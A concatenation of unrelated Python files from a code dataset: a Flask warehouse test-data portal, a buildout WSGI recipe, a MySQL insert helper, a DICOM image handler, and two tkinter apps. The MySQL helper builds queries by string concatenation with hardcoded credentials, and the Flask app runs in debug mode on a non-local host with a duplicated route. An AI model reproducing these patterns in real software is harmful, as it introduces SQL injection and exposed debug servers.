sleep_timer(2)
moving_boxes = task.change_status_for_boxes(boxes_list, local_warehouse_id)
sleep_timer(2)
route_list = task.create_route_lists(
client_id,
boxes_list,
date_time,
local_warehouse_id
)
if route_list["status"] != 201:
return f"{route_list}", 400
sleep_timer(7)
give_out = task.short_giveout_route_lists(
boxes_list, route_list["RouteListId"],
local_warehouse_id
)
if give_out["status"] != 200:
return {
"responses": {
"boxes": boxes,
"moving_boxes": moving_boxes,
"route_list": route_list
},
"give_out": give_out
}, 400
logger.debug({
"responses": {
"boxes": boxes,
"moving_boxes": moving_boxes,
"route_list": route_list,
"give_out": give_out
}
})
return {
"boxes_id": ', '.join(str(x) for x in boxes_list)
}
@logger.catch
@app.route('/create_tasks_second_service')
def create_tasks_second_service():
date_time = date_now()
boxes_list = []
client = request.args.get('client', '')
local_warehouse_id = request.args.get('local_warehouse_id', '')
payment_type = request.args.get('payment_type', '')
type_id = request.args.get('type_id', '')
boxes_count = int(request.args.get('boxes_count', ''))
if client == "":
return "Enter the client_id", 400
timeslot_response = task.get_time_ranges(
type_id=int(type_id)
)
timeslot = timeslot_response["timeSlots"]
logger.debug(
f"{client}, "
f"{local_warehouse_id}, "
f"{type_id}, "
f"{boxes_count}, "
f"{timeslot}"
)
create_tasks_second_service_responses = []
moving_boxes_responses = []
for _ in range(boxes_count):
box = task.create_tasks_second_service(
type_id=type_id, timeslot_id=timeslot,
payment_type=payment_type
)
if box["status"] != 201:
return f"{box}", 400
sleep_timer(2)
create_tasks_second_service_responses.append(box)
moving_boxes_responses.append(
task.change_status_for_box(str(box["boxId"]), int(local_warehouse_id))
)
boxes_list.append(str(box["boxId"]))
sleep_timer(3)
route_list = task.create_route_lists(
client, boxes_list, date_time, local_warehouse_id
)
sleep_timer(5)
give_out = task.short_giveout_route_lists(
boxes_list, route_list["RouteListId"],
local_warehouse_id
)
if give_out["status"] != 200:
return {
"responses": {
"timeslot": timeslot_response,
"create_tasks_second_service": create_tasks_second_service_responses,
"moving_boxes": moving_boxes_responses,
"route_list": route_list
},
"give_out": give_out
}, 400
logger.debug({
"responses": {
"timeslot": timeslot_response,
"create_tasks_second_service": create_tasks_second_service_responses,
"moving_boxes": moving_boxes_responses,
"route_list": route_list,
"give_out": give_out
}
})
return {
"box_id": boxes_list
}
@logger.catch
@app.route('/create_barcode')
def create_barcode():
global boxes, boxes_response, add_boxes_to_special_boxes, special_box, append_boxes_to_special_boxes
cartoons_count = int(request.args.get('count', ''))
boxes_count = int(request.args.get('boxes_count', ''))
route_id = int(request.args.get('route_id', ''))
local_warehouse_id = int(request.args.get('local_warehouse_id', ''))
type_id = int(request.args.get('type_id', ''))
boxes_name = ()
date_time = datetime.now()
date_time = date_time.strftime("%Y-%m-%dT00:00:00")
new_special_box = task.create_special_boxes(route_id, date_time)
if new_special_box["status"] == 201:
new_special_box = new_special_box["special_box"]
else:
return f"{new_special_box}", 400
if cartoons_count > 0:
sleep_timer(2)
boxes = task.create_tasks_third_service(
box_count=cartoons_count, local_warehouse_id=local_warehouse_id,
type_id=type_id
)
boxes_response = []
for box in boxes["box"]:
special_box = task.create_pallets(new_special_box)
if special_box["status"] != 200:
return f"{special_box}", 400
box_name = task.get_boxes_name(box)
if box_name["status"] == 200:
box_name = box_name["names"]
else:
return f"{special_box}", 400
boxes_response.append([special_box, box_name])
boxes_name.append(box_name['box']['name'])
logger.debug(boxes_name)
sleep_timer(6)
add_boxes_to_special_boxes = task.add_boxes_to_special_boxes(
new_special_box,
boxes_name
)
if boxes_count > 0:
special_box = task.create_tasks_third_service(
boxes_count=boxes_count, local_warehouse_id=local_warehouse_id,
type_id=type_id
)
sleep_timer(2)
append_boxes_to_special_boxes = task.get_boxes_within_special_boxes(
special_box["box"], new_special_box
)
sleep_timer(3)
approve_special_box = task.approve_special_boxes_into_warehouse(new_special_box)
new_special_box = f"%1%{str(new_special_box)[:12]}"
logger.debug({
"barcode": new_special_box,
"responses": {
"new_special_box": new_special_box,
"boxes": boxes or "",
"boxes_response": boxes_response or "",
"add_boxes_to_special_boxes": add_boxes_to_special_boxes or "",
"special_box": special_box or "",
"append_boxes_to_special_boxes": append_boxes_to_special_boxes or "",
"approve_special_box": approve_special_box,
}
})
return new_special_box
@logger.catch
@app.route('/forth_service_create_tasks')
def create_tasks_forth_service():
global append_boxes
date_time = date_now()
cartoons_list = []
client_id = request.args.get('client_id', '')
local_warehouse_id = request.args.get('local_warehouse_id', '')
type_id = request.args.get('type_id', '')
warehouse_place_id = int(request.args.get('warehouse_place_id', ''))
boxes_count = int(request.args.get('box_count', ""))
if client_id == "":
return "Enter the client id", 400
box = task.create_tasks_forth_service(
boxes_count=boxes_count,
local_warehouse_id=int(local_warehouse_id),
type_id=int(type_id),
)
if box["status"] != 201:
return f"{box}", 400
boxes_list = box["box"]
logger.debug(boxes_list)
sleep_timer(2)
article_boxes = task.create_pallets_boxes(local_warehouse_id, warehouse_place_id)
if article_boxes["status"] != 201:
return f"{article_boxes}", 400
sleep_timer(2)
for box in boxes_list:
append_boxes = task.append_boxes_to_special_boxes(
box, article_boxes["article_boxes"]
)
if append_boxes["status"] != 201:
return f"{append_boxes}", 400
sleep_timer(2)
articles_state = task.change_special_boxes_state(article_boxes["article_boxes"])
sleep_timer(2)
moving_boxes_response = task.change_status_for_box(
article_boxes["article_boxes"],
int(local_warehouse_id)
)
if articles_state["status"] != 200:
return f"{article_boxes}", 400
logger.debug(request.args.get('add_boxes'))
logger.debug(request.args.get('add_boxes') == "true")
boxes_response = []
moving_boxes_response = []
if request.args.get('add_boxes') == "true":
box = task.create_tasks_forth_service(
boxes_count=1, local_warehouse_id=int(local_warehouse_id),
type_id=int(type_id)
)
if box["status"] != 201:
return f"{box}", 400
sleep_timer(2)
boxes_response.append(box)
moving_boxes_response.append(
task.change_status_for_box(
str(box["box"][0]), int(local_warehouse_id)
)
)
cartoons_list.append(str(box["cartoon"][0]))
boxes_list.append(str(box["box"][0]))
sleep_timer(5)
route_list = task.create_route_lists(
client_id, boxes_list, date_time, local_warehouse_id
)
if route_list["status"] != 201:
return f"{route_list}", 400
sleep_timer(5)
cartoons_list.append(str(article_boxes["article_boxes"]))
give_out = task.short_giveout_route_lists(
cartoons_list, route_list["RouteListId"],
local_warehouse_id
)
if give_out["status"] != 200:
return f"{give_out}", 400
logger.debug({
"responses": {
"box": box,
"article_boxes": article_boxes,
"append_boxes": append_boxes,
"articles_state": articles_state,
"moving_boxes_response": moving_boxes_response,
"boxes_response": boxes_response,
"route_list": route_list,
"give_out": give_out
}
})
return {
"box_id": boxes_list
}
@logger.catch
@app.route('/update_priority_attribute')
def update_priority_attribute():
box_id = request.args.get('box_id', '')
priority = request.args.get('priority', '')
if box_id == "":
return "Enter box id", 400
box_name = task.get_boxes_name(
box_id)["names"]['box']['name']
return task.update_priority_attribute(box_name, priority)
@logger.catch
@app.route('/forth_service_create_tasks')
def create_tasks_forth_service():
global append_postings
date_time = date_now()
cartoon_list = []
client_id = request.args.get('client_id', '')
local_warehouse_id = request.args.get('local_warehouse_id', '')
type_id = request.args.get('type_id', '')
warehouse_place_id = int(request.args.get('warehouse_place_id', ''))
box_count = int(request.args.get('box_count', ""))
if client_id == "":
return "Enter the client id", 400
box_id = task.create_tasks_forth_service(
boxes_count=box_count,
local_warehouse_id=int(local_warehouse_id),
type_id=int(type_id),
)
if box_id["status"] != 201:
return f"{box_id}", 400
boxes_list = box_id["box_id"]
logger.debug(boxes_list)
article_boxes = task.create_pallets_boxes(local_warehouse_id, warehouse_place_id)
if article_boxes["status"] != 201:
return f"{article_boxes}", 400
sleep_timer(2)
for box_id in boxes_list:
append_postings = task.append_boxes_to_special_boxes(
box_id, article_boxes["article_boxes"]
)
if append_postings["status"] != 201:
return f"{append_postings}", 400
sleep_timer(2)
articles_state = task.change_special_boxes_state(article_boxes["article_boxes"])
sleep_timer(2)
moving_box_response = task.change_status_for_box(
article_boxes["article_boxes"],
int(local_warehouse_id)
)
if articles_state["status"] != 200:
return f"{article_boxes}", 400
logger.debug(request.args.get('add_box'))
logger.debug(request.args.get('add_box') == "true")
boxes_response = []
moving_boxes_response = []
if request.args.get('add_box') == "true":
box_id = task.create_tasks_forth_service(
boxes_count=1, local_warehouse_id=int(local_warehouse_id),
type_id=int(type_id)
)
if box_id["status"] != 201:
return f"{box_id}", 400
sleep_timer(2)
boxes_response.append(box_id)
moving_boxes_response.append(
task.change_status_for_box(
str(box_id["box_id"][0]), int(local_warehouse_id)
)
)
cartoon_list.append(str(box_id["box_id"][0]))
boxes_list.append(box_id["box_id"][0])
sleep_timer(3)
route_list = task.create_route_lists(
client_id, boxes_list, date_time, local_warehouse_id
)
if route_list["status"] != 201:
return f"{route_list}", 400
sleep_timer(3)
cartoon_list.append(str(article_boxes["article_boxes"]))
logger.debug({
"responses": {
"box_id": box_id,
"article_boxes": article_boxes,
"append_postings": append_postings,
"articles_state": articles_state,
"moving_box_response": moving_box_response,
"boxes_response": boxes_response,
"moving_boxes_response": moving_boxes_response,
"route_list": route_list
}
})
return {
"Result": task.load_route_list(route_list["RouteListId"]),
"Boxes list": boxes_list
}
@logger.catch
@app.route('/receipt_creating')
def receipt_creating():
payment_id = request.args.get('payment_id', '')
receipt_id = request.args.get('receipt_id', '')
created_date = request.args.get('created_date', '')
updated_date = request.args.get('updated_date', '')
done_date = request.args.get('done_date', '')
salary_type = request.args.get('salary_type', '')
payment_body = request.args.get('payment_body', '')
receipt_link = request.args.get('receipt_link', '')
cancellation_date = request.args.get('cancellation_date', '')
if not payment_id:
return "Enter PaymentID", 400
if not receipt_id:
return "Enter ReceiptID", 400
if not created_date:
return "Enter created_date", 400
if not updated_date:
return "Enter updated_date", 400
if not done_date:
return "Enter done_date", 400
if not salary_type:
return "Enter salary_type", 400
if not payment_body:
return "Enter payment_body", 400
return task.receipt_creating(
payment_id,
receipt_id,
created_date,
updated_date,
done_date,
salary_type,
payment_body,
receipt_link,
cancellation_date,
)
if __name__ == '__main__':
# run app in debug mode on port 5000
app.run(debug=True, port=8888, host='1.1.1.1')
| AgrobnarV/GenerateTestDataPortal_update | flask_app.py | flask_app.py | py | 17,818 | python | en | code | 0 | github-code | 90 |
26037666448 | import logging
import os
import stat
import zc.buildout
from zc.recipe.egg.egg import Eggs
WSGI_TEMPLATE = """\
import sys
sys.path[0:0] = [
%(syspath)s,
]
from pyramid.paster import get_app, setup_logging
configfile = "%(configfile)s"
setup_logging(configfile)
application = get_app(configfile, name=%(app_name)s)
"""
class Recipe:
def __init__(self, buildout, name, options):
self.buildout = buildout
self.name = name
self.options = options
self.logger = logging.getLogger(self.name)
if "config-file" not in options:
self.logger.error(
"You need to specify either a paste configuration file")
raise zc.buildout.UserError("No paste configuration given")
if "target" in options:
location = os.path.dirname(options["target"])
if not os.path.isdir(location):
self.logger.error(
"The 'target' option refers to a directory that is not "
"valid: %s" % location)
raise zc.buildout.UserError("Invalid directory for target")
def install(self):
egg = Eggs(self.buildout, self.options["recipe"], self.options)
reqs, ws = egg.working_set()
path = [pkg.location for pkg in ws]
extra_paths = self.options.get('extra-paths', '')
extra_paths = extra_paths.split()
path.extend(extra_paths)
# Do not put None into 'quotes'
# Everything else should be a string pointing to a pipeline
app_name = self.options.get('app_name')
if app_name is not None:
app_name = '"%s"' % app_name
output = WSGI_TEMPLATE % dict(
configfile=self.options["config-file"],
syspath=",\n ".join((repr(p) for p in path)),
app_name=app_name
)
target = self.options.get("target")
if target is None:
location = os.path.join(
self.buildout["buildout"]["parts-directory"],
self.name)
if not os.path.exists(location):
os.mkdir(location)
self.options.created(location)
target = os.path.join(location, "wsgi")
else:
self.options.created(target)
f = open(target, "wt")
f.write(output)
f.close()
exec_mask = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod(target, os.stat(target).st_mode | exec_mask)
self.options.created(target)
return self.options.created()
def update(self):
self.install()
| garbas/pyramid_recipe_modwgi | pyramid_recipe_modwsgi/__init__.py | __init__.py | py | 2,639 | python | en | code | 0 | github-code | 90 |
26010900944 | #!/usr/bin/env python3
import MySQLdb
def insert_into_table(table_name, data):
db = MySQLdb.connect(host="localhost", user="electros", passwd="electros", db="siigo")
cursor = db.cursor()
try:
query = "INSERT INTO " + table_name + "("
values = "VALUES ("
sep = ""
for key, value in data.items():
query = query + sep + key
values = values + sep + "'" + value + "'"
sep = ", "
query = query + ") " + values + ") "
cursor.execute(query)
db.commit()
db.close()
return {'message': "success creating {} on {}".format(data, table_name)}
except:
db.close()
return {'error': 'Missing foreign key'}
| Jimmer942/Siigo_hackaton_2020 | metodos/crear.py | crear.py | py | 731 | python | en | code | 0 | github-code | 90 |
20769465466 | import logging
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from PIL import ImageFilter
from bat.DicomHandler import DicomHandler
class ImageHandler(DicomHandler):
"""
ImageHandler class is a heritage of DicomHandler class.
The ImageHandler class can provide more functions based on the DicomHandler class.
"""
def __init__(self, filename):
"""
Initialization function
:param filename: input dicom file name including path
"""
self.isImageComplete = False
# self.RescaleType = {'linear', 'gamma'}
try:
# call super to init DicomHandler class first
super(self.__class__, self).__init__(filename)
except Exception as e:
logging.error(str(e))
if not self.isComplete:
logging.warning(r"Dicom class initialed failed. Procedure quited.")
return
try:
# Convert to HU unit
self.ImageHU = self.RawData * self.Slop + self.Intercept
self.ImageRaw = self.ImageHU.copy()
# calculate first time that can show image according pre-set windowing
self.rescale_image((100, 0))
# center is always in format (row, col)
# Radius is always in format (radius in pixel, radius in mm)
self.Center, self.Radius = self.calc_circle()
# define circular integration result
# self.Image_Integration_Result = np.zeros(self.Radius[0])
# self.Image_Median_Filter_Result = np.zeros(self.Radius[0])
# main calculation
# self.integration()
except Exception as e:
logging.error(str(e))
return
# set the flag to indicate initializing done
self.isImageComplete = True
logging.info(r"Image initialed OK.")
def rescale_image(self, window: tuple):
"""
rescale the image to set the data in range (0~255)
:param window: a tuple pass in as (window width, window center)
:return: return a np array as rescaled image
"""
raw_data = self.ImageHU.copy()
window_upper = window[1] + window[0] / 2
window_lower = window[1] - window[0] / 2
# make filter according to center and width
upper_filter = raw_data > window_upper
raw_data[upper_filter] = window_upper # set upper value
lower_filter = raw_data < window_lower
raw_data[lower_filter] = window_lower # set lower value
# rescale the data to 0~255
min_hu_image = raw_data.min()
max_hu_image = raw_data.max()
if min_hu_image == max_hu_image:
self.ImageRaw = (raw_data - min_hu_image) * 255
else:
# rescale the image to fit 0~255
self.ImageRaw = (raw_data - min_hu_image) * 255 / (max_hu_image - min_hu_image)
def calc_circle(self):
"""
Calculate the image center and radius
the method is simple
from up/down/left/right side to go into center
the 1st number is > mean value, it's the edge
calculate the distance from th edge to center
:return: return 2 tuples which are image center and radius
(center row, center col),(radius in pixel, radius in cm)
"""
# set up some local variables
is_abnormal = False
center_col = self.Size[0] // 2
center_row = self.Size[1] // 2
left_distance = 0
right_distance = 0
up_distance = 0
low_distance = 0
max_allowed_deviation = 20
# Using PIL to find edge and convert back to np array
# This will make calculation more accuracy
filtered_image = np.array(
Image.fromarray(self.ImageRaw)
.convert("L")
.filter(ImageFilter.FIND_EDGES)
)
# start to calculate center col
for left_distance in range(1, self.Size[1]):
if filtered_image[center_row, left_distance] != 0:
break
for right_distance in range(1, self.Size[1]):
if filtered_image[center_row, self.Size[1] - right_distance] != 0:
break
center_col += (left_distance - right_distance) // 2
logging.debug(r"Center Col calculated as: " + str(center_col))
# if the calculated center col deviated too much
if (self.Size[0] // 2 + max_allowed_deviation) < center_col < (self.Size[0] // 2 - max_allowed_deviation):
logging.warning(r"It seems abnormal when calculate Center Col, use image center now!")
center_col = self.Size[0] // 2
is_abnormal = True
# start to calculate center row
for up_distance in range(1, self.Size[0]):
if filtered_image[up_distance, center_col] != 0:
break
for low_distance in range(1, self.Size[0]):
if filtered_image[self.Size[0] - low_distance, center_col] != 0:
break
center_row += (up_distance - low_distance) // 2
logging.debug(r"Center Row calculated as: " + str(center_row))
# if the calculated center row deviated too much
if (self.Size[1] // 2 + max_allowed_deviation) < center_row < (self.Size[1] // 2 - max_allowed_deviation):
logging.warning(r"It seems abnormal when calculate Center row, use image center now!")
center_row = self.Size[1] // 2
is_abnormal = True
# set different radius according to normal/abnormal situation
if is_abnormal is False:
radius = (self.Size[0] - left_distance - right_distance) // 2
diameter_in_cm = radius * self.PixSpace[0] * 2
logging.debug(str(radius) + r"pix (radius), " + str(diameter_in_cm) +
r"cm(diameter)<==Calculated phantom diameter")
# standardize the radius
if diameter_in_cm < 250:
radius = 233
logging.debug(str(radius) + r"pix" + r", which is: " +
str(radius * self.PixSpace[0] * 2) + r"cm <==Radius Readjusted")
else:
radius = 220
logging.debug(str(radius) + r"pix" + r", which is: " +
str(radius * self.PixSpace[0] * 2) + r"cm <==Radius Readjusted")
else:
logging.warning(r"Calculated center is abnormal, use 50 as radius!")
radius = 50
diameter_in_cm = radius * self.PixSpace[0]
return (center_row, center_col), (radius, diameter_in_cm)
def bresenham(self, radius):
"""
Draw circle by bresenham method. And calculate the sum.
:param radius: set the radius of the calculated circle
"""
x = 0
y = radius
d = 3 - 2 * radius
while x < y:
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - y, self.Center[1] + x]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + y, self.Center[1] + x]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - y, self.Center[1] - x]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + y, self.Center[1] - x]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - x, self.Center[1] + y]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - x, self.Center[1] - y]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + x, self.Center[1] + y]
self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + x, self.Center[1] - y]
if d < 0:
d = d + 4 * x + 6
else:
d = d + 4 * (x - y) + 10
y -= 1
x += 1
def integration(self):
# calculate circular integration for each radius
for index in range(1, len(self.Image_Integration_Result)):
self.bresenham(index)
self.Image_Integration_Result[index] /= (index * 2 * 3.14)
# calculate data by using Median
# for the rest of the data, do the median filter with width
_width = 8
for index in range(len(self.Image_Integration_Result) - _width):
self.Image_Median_Filter_Result[index] = np.median(
self.Image_Integration_Result[index:index + _width])
def save_image(self):
if not self.isImageComplete:
logging.warning(r"Image initialed incomplete. Procedure quited.")
return
# set up the output file name
image__filename = ".jpeg"
image__filename__fig = "_fig.jpeg"
im = Image.fromarray(self.ImageRaw).convert("L")
# save image
try:
# save image
im.save(self.FileName + "_" + self.ScanMode + image__filename, "png")
# draw fig
plt.plot(self.Image_Median_Filter_Result)
plt.ylim((-5, 20))
plt.xlim((0, 250))
# draw fig image
plt.savefig(self.FileName + "_" + self.ScanMode + image__filename__fig)
except Exception as e:
logging.error(str(e))
return
finally:
plt.close()
def show_image(self):
if not self.isImageComplete:
logging.warning(r"Image initialed incomplete. Procedure quited.")
return
return Image.fromarray(self.ImageRaw).convert("L")
def show_integration_result(self):
if not self.isImageComplete:
logging.warning(r"Image initialed incomplete. Procedure quited.")
return
return self.Image_Median_Filter_Result
if __name__ == '__main__':
print("please do not use it individually unless of debugging.")
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
img = ImageHandler('/Users/qianxin/Downloads/a')
img.rescale_image((2, 100))
img.save_image()
| snakeqx/ImagePosition | bat/ImageHandler.py | ImageHandler.py | py | 10,169 | python | en | code | 0 | github-code | 90 |
39099752237 | import tkinter as tk
import tkinter.ttk as tk1
import googletrans
import textblob
window = tk.Tk()
window.geometry("900x400")
window.title("Translator by Mr. Ahmad")
#functions
def translate():
try:
# ngambil key dari bahasa asal
for key, value in languages.items():
if (value == ori_combo.get()):
from_language_key = key
#ngambil key/ id dari bahasa tujuan
for key, value in languages.items():
if(value == target_combo.get()):
target_language_key = key
#mengubah text area menjadi blob atau paket
words = textblob.TextBlob(ori_tA.get("1.0", "end-1c"))
#men-translate blob/paket
words = words.translate(from_lang=from_language_key, to=target_language_key)
#masukin kedalam target text area
target_tA.insert(1.0, words)
except:
print("Something is wrong")
def delete():
ori_tA.delete("1.0","end-1c")
target_tA.delete("1.0","end-1c")
#widgets
lb1 = tk.Label(window, text="My Translator", font=("Cooper",21),foreground="Salmon")
languages = googletrans.LANGUAGES
language_list = list(languages.values())
ori_combo = tk1.Combobox(window, width=50, state="readonly", values=language_list)
ori_tA = tk.Text(window, height=10, width=40)
target_combo = tk1.Combobox(window, width=50, state="readonly",values=language_list)
target_tA = tk.Text(window, height=10, width=40)
translateBtn = tk.Button(window, text="Translate", font=("Britannic",17),background="DarkSlateBlue",foreground="White",command=translate)
deleteBtn = tk.Button(window, text="Delete", font=("Britannic",17), background="DarkRed",foreground="White",command=delete)
#placements
lb1.grid(row=0, column=1,pady=20)
ori_combo.grid(row=1, column=0, padx=27)
ori_tA.grid(row=2, column=0, pady=15)
translateBtn.grid(row=3, column=0, ipadx=104)
target_combo.grid(row=1,column=2)
target_tA.grid(row=2,column=2)
deleteBtn.grid(row=3,column=2,ipadx=120)
window.mainloop() | madyazdhil/Basic-Python | Term A+/SAT-13/lesson17/translator.py | translator.py | py | 1,995 | python | en | code | 0 | github-code | 90 |
41620478757 | import tkinter as tk
from tkinter import messagebox, simpledialog
from tkinter import ttk
import pickle
import os.path
class DisciplinaCursada:
def __init__(self, disciplina, ano, semestre, nota):
self.__disciplina = disciplina
self.__ano = ano
self.__semestre = semestre
self.__nota = nota
def getDisciplina(self):
return self.__disciplina
def getSemestre(self):
return self.__semestre
def getNota(self):
return self.__nota
def getAno(self):
return self.__ano
class Historico:
def __init__(self):
self.__historico = []
def addMateria(self, disciplina, ano, semestre, nota):
disciplinaCursada = DisciplinaCursada(disciplina, ano, semestre, nota)
self.__historico.append(disciplinaCursada)
def getHistorico(self):
return sorted(self.__historico, key=lambda x: x.getAno())
def getDisciplinas(self):
disciplinas = []
for disciplinaCursada in self.__historico:
disciplinas.append(disciplinaCursada.getDisciplina())
return disciplinas
class Aluno:
def __init__(self, nroMatricula, nome, curso):
self.__nome = nome
self.__nroMatricula = nroMatricula
self.__curso = curso
self.__historico = Historico()
def getNome(self):
return self.__nome
def getNroMatricula(self):
return self.__nroMatricula
def getCurso(self):
return self.__curso
def getHistorico(self):
return self.__historico
def addDisciplina(self, disciplina):
self.__historico.addMateria(disciplina)
def getCargaHoraria(self):
cargaHorariaObrigatoria = 0
carregaHorariaEletiva = 0
for disciplina in self.__historico.getDisciplinas():
if self.__curso.eObrigatoria(disciplina):
cargaHorariaObrigatoria += int(disciplina.getCargaHoraria())
else:
carregaHorariaEletiva += int(disciplina.getCargaHoraria())
return [cargaHorariaObrigatoria, carregaHorariaEletiva]
class LimiteInsereAluno(tk.Toplevel):
def __init__(self, controle, listaCursosCod):
tk.Toplevel.__init__(self)
self.geometry('250x100')
self.title("Estudante")
self.controle = controle
self.frameNro = tk.Frame(self)
self.frameNome = tk.Frame(self)
self.frameCurso = tk.Frame(self)
self.frameButton = tk.Frame(self)
self.frameNro.pack()
self.frameNome.pack()
self.frameCurso.pack()
self.frameButton.pack()
self.labelNro = tk.Label(self.frameNro,text="Nro Matrícula: ")
self.labelNome = tk.Label(self.frameNome,text="Nome: ")
self.labelNro.pack(side="left")
self.labelNome.pack(side="left")
self.inputNro = tk.Entry(self.frameNro, width=20)
self.inputNro.pack(side="left")
self.inputNome = tk.Entry(self.frameNome, width=20)
self.inputNome.pack(side="left")
self.labelDiscip = tk.Label(self.frameCurso,text="Escolha o curso: ")
self.labelDiscip.pack(side="left")
self.escolhaCombo = tk.StringVar()
self.combobox = ttk.Combobox(self.frameCurso, width = 15 , textvariable = self.escolhaCombo)
self.combobox.pack(side="left")
self.combobox['values'] = listaCursosCod
self.buttonSubmit = tk.Button(self.frameButton ,text="Criar")
self.buttonSubmit.pack(side="left")
self.buttonSubmit.bind("<Button>", controle.criaAluno)
self.buttonClear = tk.Button(self.frameButton ,text="Clear")
self.buttonClear.pack(side="left")
self.buttonClear.bind("<Button>", controle.clearHandlerIns)
def mostraJanela(self, titulo, msg):
messagebox.showinfo(titulo, msg)
class LimiteInsereAlunoDisciplina(tk.Toplevel):
def __init__(self, controle, listaDiscCod):
tk.Toplevel.__init__(self)
self.geometry('250x250')
self.title("Estudante")
self.controle = controle
self.frameNota = tk.Frame(self)
self.frameNota.pack()
self.frameAno = tk.Frame(self)
self.frameAno.pack()
self.frameSemestre = tk.Frame(self)
self.frameSemestre.pack()
self.frameDiscip = tk.Frame(self)
self.frameDiscip.pack()
self.frameButton = tk.Frame(self)
self.frameButton.pack()
self.labelNota= tk.Label(self.frameNota,text="Nota:")
self.labelAno = tk.Label(self.frameAno,text="Ano")
self.labelSemestre = tk.Label(self.frameSemestre,text="Semestre")
self.labelAno.pack()
self.labelNota.pack()
self.labelSemestre.pack()
self.inputNota = tk.Entry(self.frameNota, width=20)
self.inputNota.pack(side="left")
self.inputAno = tk.Entry(self.frameAno, width=20)
self.inputAno.pack(side="left")
self.inputSemestre = tk.Entry(self.frameSemestre, width=20)
self.inputSemestre.pack(side="left")
self.labelDiscip = tk.Label(self.frameDiscip,text="Escolha o Disciplina: ")
self.labelDiscip.pack()
self.escolhaCombo = tk.StringVar()
self.combobox = ttk.Combobox(self.frameDiscip, width = 15 , textvariable = self.escolhaCombo)
self.combobox.pack()
self.combobox['values'] = listaDiscCod
self.buttonSubmit = tk.Button(self.frameButton ,text="Enter")
self.buttonSubmit.pack(side="left")
self.buttonSubmit.bind("<Button>", controle.insereDisciplinaHandler)
self.buttonClear = tk.Button(self.frameButton ,text="Clear")
self.buttonClear.pack(side="left")
self.buttonClear.bind("<Button>", controle.clearHandlerInsDisc)
def mostraJanela(self, titulo, msg):
messagebox.showinfo(titulo, msg)
class LimiteMensagem():
def __init__(self, str):
messagebox.showinfo('Aluno', str)
class CtrlAluno():
def __init__(self, controlePrincipal):
self.ctrlPrincipal = controlePrincipal
if not os.path.isfile("alunos.pickle"):
self.listaAlunos = []
else:
with open("alunos.pickle", "rb") as f:
self.listaAlunos = pickle.load(f)
def salvaDados(self):
if len(self.listaAlunos) != 0:
with open("alunos.pickle","wb") as f:
pickle.dump(self.listaAlunos, f)
def insereAlunos(self):
self.listaAlunosTurma = []
listaCursosCod = self.ctrlPrincipal.ctrlCurso.getListaCodCursos()
self.limiteIns = LimiteInsereAluno(self, listaCursosCod)
def criaAluno(self, event):
nroMatric = self.limiteIns.inputNro.get()
nome = self.limiteIns.inputNome.get()
cursoCod = self.limiteIns.escolhaCombo.get()
if nroMatric == '' or nome == '' or cursoCod == '':
self.limiteIns.mostraJanela('Erro', 'Preencha todos os campos')
else:
curso = self.ctrlPrincipal.ctrlCurso.getCurso(cursoCod)
aluno = Aluno(nroMatric, nome, curso)
self.listaAlunos.append(aluno)
self.limiteIns.mostraJanela('Sucesso', 'Estudante cadastrado com sucesso')
self.clearHandlerIns(event)
self.limiteIns.destroy()
def clearHandlerIns(self, event):
self.limiteIns.inputNro.delete(0, tk.END)
self.limiteIns.inputNome.delete(0, tk.END)
self.limiteIns.escolhaCombo.set('')
def clearHandlerInsDisc(self, event):
self.limiteInsDisciplina.inputNota.delete(0, tk.END)
self.limiteInsDisciplina.inputAno.delete(0, tk.END)
self.limiteInsDisciplina.inputSemestre.delete(0, tk.END)
self.limiteInsDisciplina.escolhaCombo.set('')
def cadastraDsciplinaCursada(self):
matricula = simpledialog.askstring('Aluno', 'Digite o código do aluno: ')
alunoSel = None
for aluno in self.listaAlunos:
if matricula == aluno.getNroMatricula():
alunoSel = aluno
if alunoSel is not None:
self.alunoSel = alunoSel
else:
self.ctrlPrincipal.limite.mostraJanela('Erro', 'Aluno não encontrado')
return
disciplinas = self.ctrlPrincipal.ctrlDisciplina.getDisciplinas()
disciplinasNCursadas= []
disciplinasCursadas = alunoSel.getHistorico().getDisciplinas()
for disciplina in disciplinas:
cursou = False
for disciplinaCursada in disciplinasCursadas:
if disciplina.getCodigo() == disciplinaCursada.getCodigo():
cursou = True
break
if not cursou:
disciplinasNCursadas.append(disciplina)
disciplinasCod = []
for disciplina in disciplinasNCursadas:
disciplinasCod.append(disciplina.getCodigo())
self.limiteInsDisciplina = LimiteInsereAlunoDisciplina(self, disciplinasCod)
def insereDisciplinaHandler(self, event):
disciplinaCod = self.limiteInsDisciplina.escolhaCombo.get()
disciplina = self.ctrlPrincipal.ctrlDisciplina.getDisciplina(disciplinaCod)
if disciplina is None:
self.ctrlPrincipal.limite.mostraJanela('Erro', 'Disciplina não encontrada')
return
ano = self.limiteInsDisciplina.inputAno.get()
semestre = self.limiteInsDisciplina.inputSemestre.get()
nota = self.limiteInsDisciplina.inputNota.get()
self.alunoSel.getHistorico().addMateria(disciplina, ano, semestre, nota)
self.limiteInsDisciplina.mostraJanela('Sucesso', 'Disciplina cadastrada com sucesso')
self.clearHandlerInsDisc(event)
self.limiteInsDisciplina.destroy()
def consultarAluno(self):
alunoCod = simpledialog.askstring('Aluno', 'Digite o código do aluno: ')
aluno = None
for el in self.listaAlunos:
if alunoCod == el.getNroMatricula():
aluno = el
if aluno is not None:
res = 'Nome: ' + aluno.getNome() + '\n'
res += 'Matrícula: ' + aluno.getNroMatricula() + '\n'
res += 'Curso: ' + aluno.getCurso().getNome() + '\n'
obrigatoria, pendente = aluno.getCargaHoraria()
res += 'Carga horária obrigatória: ' + str(obrigatoria) + '\n'
res += 'Carga horária pendente: ' + str(pendente) + '\n'
for disciplinaCursada in aluno.getHistorico().getHistorico():
disciplina = disciplinaCursada.getDisciplina()
situacao = "Aprovado"
if int(disciplinaCursada.getNota()) < 6:
